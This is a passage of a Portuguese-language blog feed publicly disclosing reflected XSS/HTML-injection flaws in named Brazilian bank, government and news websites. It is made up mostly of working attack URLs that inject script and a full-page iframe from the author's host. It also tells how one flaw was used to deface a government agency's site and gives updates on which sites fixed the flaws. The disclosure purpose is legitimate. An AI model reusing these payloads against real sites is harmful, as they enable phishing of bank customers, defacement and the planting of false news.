<code>https://wwws.banese.com.br/netbanking/index.jsp?Agencia=&quot;&gt;&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_banese/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="https://wwws.banestes.com.br/cgi-bin/RedirectHtml?url=apresentaModulo&Conta=%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banestes/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--">BANESTES - Banco do Estado do Espírito Santo</a> (ou <a href="https://wwws.banestes.com.br/cgi-bin/RedirectHtml?url=apresentaModulo&Conta=%22%3E%3C/a%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banestes%22%20width=%22500%22%20height=%22300%22%3E%3C!--">sem JavaScript</a>)<br />
<code>https://wwws.banestes.com.br/cgi-bin/IB_Login?gb=passa&amp;ct=&quot;&gt;&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_banestes/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=%3Cscript%3Ewindow.onload=function()%7Bdocument.write('%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banrinsul/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E')%7D%3C/script%3E">BANRINSUL - Banco do Estado do Rio Grande do Sul</a> (ou <a href="https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banrinsul%22%20width=%22500%22%20height=%22300%22%3E">sem JavaScript</a>) (Fixed! Corrigido!)<br />
<code>https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_banrinsul/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&ageconta=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_brb/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E">BRB - Banco de Brasília</a> (ou <a href="https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&ageconta=%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_brb%22%20width=%22500%22%20height=%22300%22%3E">sem JavaScript</a>)<br />
<code>https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&amp;ageconta=&quot;&gt;&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_brb/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_brp/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E">BRP - Banco Ribeirão Preto</a> (ou <a href="https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta=%22%3E%3Ciframe%20src=%27http://metal.mundobugado.org/banco_brp%27%20height=%27300%27%20width=%27500%27%3E">sem JavaScript</a>)<br />
<code>https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta=&quot;&gt;&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_brp/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="http://www.smbcgroup.com.br/searchBrasilp/?SearchView&Query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_smbc%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E">BSMB - Banco Sumitomo Mitsui Brasileiro</a> (ou <a href='http://www.smbcgroup.com.br/searchBrasilp/?SearchView&Query=<iframe src="http://metal.mundobugado.org/banco_smbc" width="500" height="300">'>sem JavaScript</a>)<br />
<code>http://www.smbcgroup.com.br/searchBrasilp/?SearchView&amp;Query=&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_smbc&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
<h3>.gov.br</h3><br />
* <a href="https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&email=%3Cscript%3Ewindow.onload=function()%7Bdocument.write('%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/anvisa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E')%7D%3C/script%3E">ANVISA - Agência Nacional de Vigilância Sanitária</a> (ou <a href="https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&email=%3Ciframe%20src=%22http://metal.mundobugado.org/anvisa%22%20width=%22500%22%20height=%22300%22%3E">sem JavaScript</a>)<br />
<code>https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&amp;email=&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/anvisa/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="http://www.tce.mg.gov.br/?cod_secao=5P&tipo=2&url=Pesquisa_Processo.asp&cod_secao_menu=5K&cpf=%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Ciframe%20src=%27http://gnu.org%27%20widht=%27500%27%20height=%27300%27%3E%3C!--">TCEMG - Tribunal de Contas do Estado de Minas Gerais</a><br />
<code>http://www.tce.mg.gov.br/?cod_secao=5P&amp;tipo=2&amp;url=Pesquisa_Processo.asp&amp;cod_secao_menu=5K&amp;cpf=&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;iframe src=&quot;http://gnu.org&quot; width=&quot;500&quot; height=&quot;300&quot;&gt;</code><br />
<br />
<h3>Outras empresas</h3><br />
* <a href="http://busca.igbusca.com.br/app/search?first_o=IG&q=%22%3E%3Cscript%3Ewindow.onload=function()%7Bdocument.write('%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/ig/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E')%7D%3C/script%3E">IG</a> (ou <a href="http://busca.igbusca.com.br/app/search?first_o=IG&q=%22%3E%3Ciframe%20src=http://metal.mundobugado.org/ig%20width=500%20height=300%3E" title="sem JavaScript">sem JavaScript</a>)<br />
<code>http://busca.igbusca.com.br/app/search?first_o=IG&amp;q=&quot;&gt;&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/ig/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=49103&query=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/unimed/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E" title="UNIMED">UNIMED</a> (ou <a href="http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=49103&query=%22%3E%3Ciframe%20src=http://metal.mundobugado.org/unimed%20width=500%20height=300%3E" tile="sem JavaScript">sem JavaScript</a>)<br />
<code>http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&amp;cd_secao=49103&amp;query=&quot;&gt;&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/unimed/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
<br />
<b>UPDATE 24/05/2001 - 14h03</b><br />
<code>Mensagem do BANRINSUL:<br />
Prezado Marcelo,<br />
Esta vulnerabilidade já havia sido identificada pelos nossos técnicos e estava em processo de correção.<br />
Graças ao seu comunicado este procedimento foi priorizado e a vulnerabilidade corrigida.<br />
Agradecemos seu contato.</code><br />
<br />
<b>UPDATE 24/05/2001 - 18h00</b><br />
<code>BANESTES corrigiu pela metade a falha, retirando o método GET e deixando o POST =/<br />
Além disso, existem outras URLs e parâmetros com a falha que você pode <a href="https://wwws.banestes.com.br/cgi-bin/RedirectHtml?url=apresentaModulo&Conta=%22%3E%3C/a%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banestes%22%20width=%22500%22%20height=%22300%22%3E%3C!--" title="Falha no BANESTES">testar aqui</a> e <a href="https://wwws.banestes.com.br/cgi-bin/RedirectHtml?url=apresentaModulo&Conta=%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banestes/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--" title="Falha no BANESTES">aqui</a>.</code><br />
<br />
<b>UPDATE 25/05/2001 - 11h15</b><br />
<code>BRP corrigiu pela metade a falha (você pode <a href="https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta=%22%3E%3Ciframe%20src='http://metal.mundobugado.org/banco_brp'%20height='300'%20width='500'%3E">ver aqui</a>), mas já agradeceu:<br />
<br />
Marcelo,<br />
O Banco BRP agradece pela sua informação.<br />
Att.<br />
Tecnologia da Informação<br />
Banco BRP</code><br />
<br />
<b>UPDATE 25/05/2001 - 15h35</b><br />
<code>BRP corrigiu tudo</code>
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Segurança Nacional</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=54&amp;w=my_weblog" />
		<updated>2011-06-07T19:15:00-03:00</updated>
		<published>2011-05-11T19:32:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.54</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">De: "Marcelo Jorge Vieira" <metal@mundobugado.org>
Para:  "ANP Imprensa" <imprensa@anp.gov.br>, "CAIXA - Imprensa" <imprensa@caixa.gov.br>, "Jorge Fontes Hereda" <presidencia@caixa.gov.br>, "Joaquim Lima de Oliveira" <vitec@caixa.gov.br>, "CEB - Comunicação Social" <prcoe@ceb.com.br>, "Conselho de Consumidores da CEB" <conselho.ceb@ceb.com.br>, "Glaucius Oliva" <presidencia@cnpq.br>, "CNPq Ascom" <comunicacao@cnpq.br>, "Olímpio Cruz" <olimpio.cruz@agricultura.gov.br>, "MMA Ascom" <imprensa@agricultura.gov.br>, "Maria Lucia Muniz" <mlmuniz@mct.gov.br>, "MCT Ascom" <ascomt@mct.gov.br>, "Maristela Rangel Pinto" <cgm@cultura.gov.br>, "Nanan Catalão" <nanan.catalao@cultura.gov.br>, "Denise Mantovani" <denise.mantovani@mda.gov.br>, "MDA Ascom" <comunicacao.social@mda.gov.br>, "Nunzio Briguglio Filho" <nunzio@mec.gov.br>, "MEC Ascom" <imprensa@mec.gov.br>, "Ramiro Alves" <ramiro.alves@fazenda.gov.br>, "MF Ascom" <acs@fazenda.gov.br>, "Gerusa Barbosa" <gerusa.barbosa@mma.gov.br>, "MMA Ascom" <ascom@mma.gov.br>, "Antônio Carlos" <aclima@mme.gov.br> ,"MME Ascom" <ascom@mme.gov.br>, "Vanice Cioccari" <vanice.cioccari@mj.gov.br>, "MJ Ascom" <acs@mj.gov.br>, "PBH Ascom" <ascom@planejamento.mg.gov.br>, "Walter Carlos Auad Sotomayor" <walter.sotomayor@turismo.gov.br>, "Turismo Ascom" <imprensa@turismo.gov.br>, "Selvino Heck" <mobsocial@planalto.gov.br>, "Casa Civil da Presidência da República" <mprensaccivil@presidencia.gov.br>, "Benjamin Zymler" <min-bz@tcu.gov.br>, "Augusto Nardes" <min-an@tcu.gov.br>, "Estadão - Fale com" <falecom.estado@grupoestado.com.br>, "Estadão - Portal" <portal@grupoestado.com.br>, "Nelson Nunes" <nnunes@diariosp.com.br>, "Carlos Alencar" <carlos.alencar@diariosp.com.br>, "Ulisses Oliveira" <ulisses.oliveira@diariosp.com.br>, "Teodomiro Braga" <teodomiro@otempo.com.br>, "Fábio A. Santos" <tecnologia@otempo.com.br>, "Luiz Fernando Rocha" <luizrocha@otempo.com.br>, "Mylena Fiori" <mfiori@cartamaior.com.br>, "Carta Maior - Redação" <redacao@cartamaior.com.br>, "Terra - Abuse" <abuse@terra.com.br>, "Terra - Editorial" <editorial@terra.com.br>, "Roberto Borges Martins" <presidencia@redeminas.mg.gov.br>, "Hugo Teixeira" <hugoteixeira@redeminas.mg.gov.br>, "Franco Brostel Nunes Leal" <franco@redeminas.mg.gov.br>, "Luiz Silvério Pereira Meireles" <ditec@redeminas.mg.gov.br>, "Rodolfo Fernandes" <rodolfo@oglobo.com.br>, "Maria Fernanda Delmas" <fernanda.delmas@oglobo.com.br>, "Ascânio Seleme" <ascanio@oglobo.com.br>, "Folha Emergência" <folhaemergencia@uol.com.br>, "Folha Poder" <politica@uol.com.br>, "Ministério da Defesa" <imprensa@defesa.gov.br>, "Ministério da Defesa - Ascom" <ascom@defesa.gov.br>,

Olá,

No início do mês de Abril, eu descobri uma falha no site da ANP (Agência Nacional do Petróleo), que eu explorei para mudar a visualização do site, inserindo um formulário, um abaixo-assinado, onde um visitante poderia assinar seu nome como uma forma de protesto aos altos preços dos combustíveis.

Essa falha (primária) não altera o conteúdo do site, apenas muda a visualização e só funciona, se o usuário clicar em um link "batizado" com parâmetros específicos, como, por exemplo, o link abaixo usado para inserir o formulário no site da ANP: http://www.anp.gov.br/?q=<iframe src='http://mundobugado.org/anp'> (o link não funciona mais, o pessoal da ANP já consertou a falha nesse ponto).

No meu blog, tem um relato explicando melhor o caso da ANP e o Mundo Bugado.

Como sou curioso, quis saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.

.gov.br:ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)Brazilian Tourism Portal (Ministério do Turismo)CAIXA (O banco que acredita nas pessoas)CEB (Companhia Energética de Brasília)Domínio Público (Ministério da Educação)Embratur (Ministério do Turismo)MF (Ministério da Fazenda)MINC (Ministério da Cultura MMA (Ministério do Meio Ambiente)MME (Ministério de Minas e Energia)MDA (Ministério do Desenvolvimento Agrário)MCT (Ministério da Ciência e Tecnologia)Portal da Transparência (Presidência)Plataforma Lattes (CNPq)SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)TCU (Tribunal de Contas da União)
Jornal/TV: EstadãoCarta MaiorO TEMPODiário de São PauloTerraRede Minas

O que eu quero com esse email?! Reportar essa falha, porque ela poderia ser explorada de várias maneiras:
Uma pessoa mal intencionada poderia substituir a página inicial da CAIXA para "roubar" as contas de alguns clientes.Usar o site do Ministério da Cultura para falar mal da Ministra, uma vez que surgiram vários temas relacionados à ela nos últimos dias.Fazer mais uma campanha sobre os altos preços dos combustíveis no site da ANP.Usar o site do Ministério da Fazenda para falar que não é mais preciso declarar Imposto Renda.Publicar todas as falsas notícias no ESTADÃO, no Diário de São Paulo, no O Tempo, no Terra, na Carta Maior e na Rede Minas.
Com essa coleção de sites, é bem fácil criar uma rede de intrigas, verdades ou mentiras, como, por exemplo, "O brasil desistiu de sediar a copa", "O brasil vai vender a Amazônia", etc.

Por todos os motivos citados acima, essa falha é uma questão de Segurança Nacional.

Estou enviando e publicando esse email, porque não acredito no contato privado com suas instituições. A ANP demonstrou muito bem esse ponto ao não assumir a falha no site e no sistema de preços, e ainda fazer um comunicado sobre um endereço falso circulando na Internet e ao mesmo tempo retirar o sistema de consulta dos preços do ar.

Segue os links com as páginas alteradas, para confirmar

.gov.br:

* ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis) (Fixed! Corrigido!)
http://www.anp.gov.br/SITE/acao/estaaqui/?s1=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/anp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* Brazilian Tourism Portal (Ministério do Turismo)
http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/braziltour/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220</code>%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E

* CAIXA (O banco que acredita nas pessoas)
http://www1.caixa.gov.br/busca/resultados.asp?q2=1&amp;q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--

* CEB (Companhia Energética de Brasília)
http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&amp;pesquisa=%3Ciframe%20src=%22http://metal.mundobugado.org/ceb/%22%20width=%221260%22%20height=%222500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E

* Domínio Público (Ministério da Educação) (Fixed! Corrigido!)
http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/dominiopublico/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E

* Embratur (Ministério do Turismo)
http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')"><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/embratur/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* MF (Ministério da Fazenda) (Fixed! Corrigido!)
http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/fazenda/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--

* MINC (Ministério da Cultura)
http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/minc/" width="1260" height="9100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* MMA (Ministério do Meio Ambiente)
http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&amp;busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/mma/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E

* MME (Ministério de Minas e Energia)
http://www.mme.gov.br/mme/buscaresult.html?field=content&amp;index=indice_mme&amp;query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mme/%22%20width=%221260%22%20height=%223500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E

* MDA (Ministério do Desenvolvimento Agrário)
http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%27http://metal.mundobugado.org/mda/%27%20width=%271260%27%20height=%273200%27%20frameborder=%270%27%20marginheight=%270%27%20marginwidth=%270%27%20scrolling=%27no%27%3E%3C/body%3E%22%29%20}%29

* MCT (Ministério da Ciência e Tecnologia)
http://www.mct.gov.br/index.php?action=/html/objects/search_result&amp;searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mct/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%20}%3C/script%3E%3C!--

* Portal da Transparência (Presidência)
http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&amp;periodoInicio="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/portaltransparencia/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* Plataforma Lattes (CNPq)
http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&amp;textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/cnpq\%22%20%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E

* SINDEC (Sistema Nacional de Informações de Defesa do Consumidor) (Fixed! Corrigido!)
https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/sindec/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--

*  TCU (Tribunal de Contas da União)
https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&amp;p_submit_url=&amp;p_cancel_url=&amp;locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E

Jornal/TV:

* Estadão (Fixed! Corrigido!)
http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E

* Carta Maior
http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/cartamaior/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--

* O TEMPO
http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/otempo/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E

* Diário de São Paulo
http://www.diariosp.com.br/?id=%2Fbusca.php&amp;ds_busca=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/diariosp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

*  Terra (Fixed! Corrigido!)
http://buscador.terra.com.br/Default.aspx?source=Search&amp;ca=s&amp;query=%3C/title%3E%3Ciframe%20src=%22http://is.gd/lCgKDa%22%20width=1260%20height=2100%20frameborder=0%20scrolling=%22no%22%3E%3C!--

* Rede Minas
http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http%3A/%252Fmetal.mundobugado.org/redeminas/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%7D%3C/script%3E

O que é HTML Injection ou XSS (Cross-site scripting)?

HTML Injection é um tipo de vulnerabilidade encontrada normalmente em sistemas Web e é explorada com a inserção de código HTML/JavaScript nos parâmetros de um formulário, por exemplo. Não faz nenhuma mudança nos arquivos do servidor, apenas muda a visualização dos dados para o usuário.

O que é HTML?

"HTML (acrônimo para a expressão inglesa HyperText Markup Language, que significa Linguagem de Marcação de Hipertexto) é uma linguagem de marcação utilizada para produzir páginas na Web" -- Wikipédia

O que é JavaScript?

JavaScript é uma linguagem de programação muito utilizada para produzir páginas na Web.

Como resolver?

Remover todas as tags HTML de todos os parâmetros. Para cada linguagem utilizada para produzir o site, existe uma forma de remover as tags: ASP, PHP, Python, Java.

-------

UPDATE 17/05/2011 - 20h34
ANP, Dominio Público e Terra corrigiram as "brechas".

UPDATE 18/05/2011 - 00h07
ESTADÃO corrigiu a "brecha".

UPDATE 18/05/2011 - 11h12
Caro Marcelo,
A falha mencionada foi corrigida, agradecemos a notificação.
Atenciosamente,

Lucas Betti Domingues
Equipe de Segurança Terra - Depto. de Abuse
abuse@terra.com.br
SAN - Servico de Atendimento Nacional
Fax: (51) 3287-9087

UPDATE 19/05/2011 - 11h33
 SINDEC corrigiu a "brecha".

UPDATE 23/05/2011 - 23h32
